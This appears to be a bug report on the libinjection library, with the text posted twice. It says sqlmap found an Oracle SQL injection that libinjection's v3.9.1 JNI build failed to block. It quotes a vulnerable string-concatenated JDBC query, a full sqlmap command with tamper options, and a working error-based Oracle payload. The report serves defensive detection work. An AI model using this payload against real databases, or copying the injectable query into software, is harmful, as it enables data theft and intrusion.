Testing with SQLMap revealed vulnerability with Oracle.
Initially we tested with the old external Java port (https://github.com/jeonglee/Libinjection) against Oracle and the report came out clean. No vulnerabilities detected.
However when tested with the latest main code base v3.9.1 (https://github.com/client9/libinjection) using JNI, SQLMap identified an injection point and stopped.
Please let know if I am missing anything here. Would be happy to provide additional details and test code. We are simply using the parameter to make a back-end oracle JDBC query using
Select * from EMPLOYEES where UPPER(NAME) like '%'" + employeeName.toUpperCase() + "%'";
SQLMap command used for testing:
dev@winpc /cygdrive/c/Users/dev/sql-map/sqlmap-1.1.3
$ python "C:\Users\dev\sql-map\sqlmap-1.1.3\sqlmap.py" --url="http://localhost:8080/was-test-1.2-SNAPSHOT/employee?name=David" --timeout=10 --retries=1 --keep-alive --threads=3 --batch --level=5 --risk=3 --flush-session -p name --keep-alive --tamper="between,randomcase,space2comment" --dbms oracle
Error reported by Sqlmap:
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1356 HTTP(s) requests:
Parameter: name (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
Payload: name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo
Testing with SQLMap revealed vulnerability with Oracle.
Initially we tested with the old external Java port (https://github.com/jeonglee/Libinjection) against Oracle and the report came out clean. No vulnerabilities detected.
However when tested with the latest main code base v3.9.1 (https://github.com/client9/libinjection) using JNI, SQLMap identified an injection point and stopped.
Please let know if I am missing anything here. Would be happy to provide additional details and test code. We are simply using the parameter to make a back-end oracle JDBC query using Select * from EMPLOYEES where UPPER(NAME) like '%'" + employeeName.toUpperCase() + "%'";
SQLMap command used for testing: dev@winpc /cygdrive/c/Users/dev/sql-map/sqlmap-1.1.3 $ python "C:\Users\dev\sql-map\sqlmap-1.1.3\sqlmap.py" --url="http://localhost:8080/was-test-1.2-SNAPSHOT/employee?name=David" --timeout=10 --retries=1 --keep-alive --threads=3 --batch --level=5 --risk=3 --flush-session -p name --keep-alive --tamper="between,randomcase,space2comment" --dbms oracle
Error reported by Sqlmap: GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 1356 HTTP(s) requests:
Parameter: name (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) Payload: name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo